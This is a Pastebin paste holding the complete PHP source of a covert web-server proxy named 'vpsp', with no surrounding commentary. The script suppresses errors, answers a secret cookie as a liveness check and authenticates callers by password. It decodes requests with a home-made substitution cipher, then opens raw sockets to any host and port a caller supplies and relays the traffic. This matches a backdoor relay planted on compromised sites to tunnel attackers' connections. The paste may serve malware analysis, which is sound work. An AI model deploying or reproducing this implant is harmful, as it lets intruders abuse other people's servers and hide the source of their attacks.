SHARE
TWEET

Untitled

benkow_ Apr 5th, 2016 (edited) 147 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  <?php
  2.  
  3. define('vpsp_version', '2.5.0');
  4. define('vpsp_pwd', 'RETRACTED');
  5. define('vpsp_enc_key', 'RETRACTED');
  6. error_reporting(~E_ALL);
  7.  
  8. @set_time_limit(0);
  9. ob_implicit_flush(1);
  10. ignore_user_abort(0);
  11.  
  12. if (isset($_COOKIE['RETRACTED'])) {echo '----OK---'; exit();}
  13.  
  14. header('Content-type: application/octet-stream');
  15. header('Content-Transfer-Encoding: binary');
  16. header('X-VPSP-VERSION: ' . vpsp_version);
  17.  
  18. $input = fopen('php://input', 'r');
  19. define('vpsp_enc',  ord(fread($input, 1)) != 0);
  20. $ok;
  21.  
  22. if (vpsp_enc) {
  23.     if (isset($GLOBALS['vpsp_pe']) == false) {
  24.         $GLOBALS['vpsp_ks'] = VC_GenerateKeyHash(vpsp_enc_key);
  25.         $GLOBALS['vpsp_pe'] = VC_Init(vpsp_enc_key, $GLOBALS['vpsp_ks']);
  26.     }
  27.     $GLOBALS['vpsp_pd'] = array_flip($GLOBALS['vpsp_pe']);
  28.    
  29.     $ok = VC_Decrypt(fread($input, 2));
  30.     if ($ok != 'OK') {
  31.         header('X-VPSP-ERROR: bad_enc_key');
  32.         header('X-VPSP-HOST: ' . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
  33.         exit;
  34.     }
  35.     $rBuffLen = ord(VC_Decrypt(fread($input, 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
  36.     $sBuffLen = ord(VC_Decrypt(fread($input, 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
  37.     $reqPwdLen = ord(VC_Decrypt(fread($input, 1)));
  38.     $reqPwd = ($reqPwdLen > 0) ? VC_Decrypt(fread($input, $reqPwdLen)) : '';
  39.     $https = ord(VC_Decrypt(fread($input, 1)));
  40.     $host = VC_Decrypt(fread($input, ord(VC_Decrypt(fread($input, 1)))));
  41.     $port = ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
  42. } else {
  43.     $ok = fread($input, 2);
  44.     if ($ok != 'OK') {
  45.         header('X-VPSP-ERROR: bad_request');
  46.         header('X-VPSP-HOST: ' . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
  47.         exit;
  48.     }
  49.     $rBuffLen = ord(fread($input, 1)) * 256 * 256 * 256 + ord(fread($input, 1)) * 256 * 256 + ord(fread($input, 1)) * 256 + ord(fread($input, 1));
  50.     $sBuffLen = ord(fread($input, 1)) * 256 * 256 * 256 + ord(fread($input, 1)) * 256 * 256 + ord(fread($input, 1)) * 256 + ord(fread($input, 1));
  51.     $reqPwdLen = ord(fread($input, 1));
  52.     $reqPwd = ($reqPwdLen > 0) ? fread($input, $reqPwdLen) : '';
  53.     $https = ord(fread($input, 1));
  54.     $host = fread($input, ord(fread($input, 1)));
  55.     $port = ord(fread($input, 1)) * 256 + ord(fread($input, 1));
  56. }
  57.  
  58. if ($reqPwd !== vpsp_pwd) {
  59.     $resp = "HTTP/1.0 401 Unauthorized\r\nX-VPSP-VERSION: " . vpsp_version . "\r\nX-VPSP-ERROR: bad_password\r\nX-VPSP-HOST: " . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']  . "\r\nConnection: close\r\n\r\n";
  60.     if (vpsp_enc) {
  61.         echo VC_Encrypt($resp);
  62.     } else {
  63.         echo $resp;
  64.     }
  65.     exit;
  66. }
  67.  
  68. if ($https == 1) {
  69.     $host = 'ssl://' . $host;
  70. }
  71.  
  72. $fsok = fsockopen($host, $port, $errno, $errstr, 20);
  73. if ($fsok == false) {
  74.     $resp = "HTTP/1.0 503 Service Unavailable\r\nX-VPSP-VERSION: " . vpsp_version . "\r\nX-VPSP-ERROR: host_down\r\nX-VPSP-ERROR-TEXT: " . base64_encode($errstr) ."\r\nX-VPSP-HOST: " . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . "\r\nX-VPSP-TARGET: " . str_replace('ssl://', '', $host) . "\r\nConnection: close\r\n\r\n";
  75.     if (vpsp_enc) {
  76.         echo VC_Encrypt($resp);
  77.     } else {
  78.         echo $resp;
  79.     }
  80.     exit;
  81. }
  82.  
  83. while ($wbuffer = fread($input, $rBuffLen)) {
  84.     if (vpsp_enc) {
  85.         fwrite($fsok, VC_Decrypt($wbuffer));
  86.     } else {
  87.         fwrite($fsok, $wbuffer);
  88.     }
  89. }
  90.  
  91. fflush($fsok);
  92.  
  93. while ($rbuffer = fread($fsok, $sBuffLen)) {
  94.     if (vpsp_enc) {
  95.         echo VC_Encrypt($rbuffer);
  96.     } else {
  97.         echo $rbuffer;
  98.     }
  99. }
  100. fflush($fsok);
  101. fclose($fsok);
  102.  
  103. function MD5Hash($str) {
  104.     $m = md5($str);
  105.     $s = '';
  106.      foreach(explode("\n", trim(chunk_split($m, 2))) as $h) {
  107.          $s .= chr(hexdec($h));
  108.      }
  109.     return $s;
  110. }
  111.  
  112. function VC_Init($key, $ks) {
  113.     $s = range(0, 255);
  114.     if (strlen($key) == 0) {
  115.         return $s;
  116.     }
  117.     $km = MD5Hash($key);
  118.     $kx = '';
  119.     for ($i = 0; $i < 16; $i++) {
  120.         $kx .= MD5Hash($km . $km[$i] .  chr($ks));
  121.     }
  122.     $r = ($ks % 0x0F) + 1;
  123.     $j = $ks;
  124.     for ($n = 0; $n < $r; $n++) {
  125.         for ($i = 0; $i < 256; $i++) {
  126.             $j = (($j + $s[$i] + $n + ord($kx[$i])) ^ $ks) % 256;
  127.             $t = $s[$i];
  128.             $s[$i] = $s[$j];
  129.             $s[$j] = $t;
  130.         }
  131.     }
  132.     for ($i = 0; $i < 256; $i++) {
  133.         $s[$i] = $s[$i] ^ $ks;
  134.     }
  135.     return $s;
  136. }
  137.  
  138. function VC_GenerateKeyHash($key) {
  139.     $m = MD5Hash($key);
  140.     $kt = 0;
  141.     for ($i = 0; $i < 16; $i++) {
  142.         $kt += ord($m[$i]);
  143.     }
  144.     return $kt % 256;
  145. }
  146.  
  147. function VC_Encrypt($str) {
  148.     $pe = $GLOBALS['vpsp_pe'];
  149.     $out = '';
  150.     $len = strlen($str);
  151.     for ($y = 0; $y < $len; $y++) {
  152.         $out .= chr($pe[ord($str[$y])]);
  153.     }
  154.     return $out;
  155. }
  156.  
  157. function VC_Decrypt($str) {
  158.     $pd = $GLOBALS['vpsp_pd'];
  159.     $out = '';
  160.     $len = strlen($str);
  161.     for ($y = 0; $y < $len; $y++) {
  162.         $out .= chr($pd[ord($str[$y])]);
  163.     }
  164.     return $out;
  165. }
RAW Paste Data
Top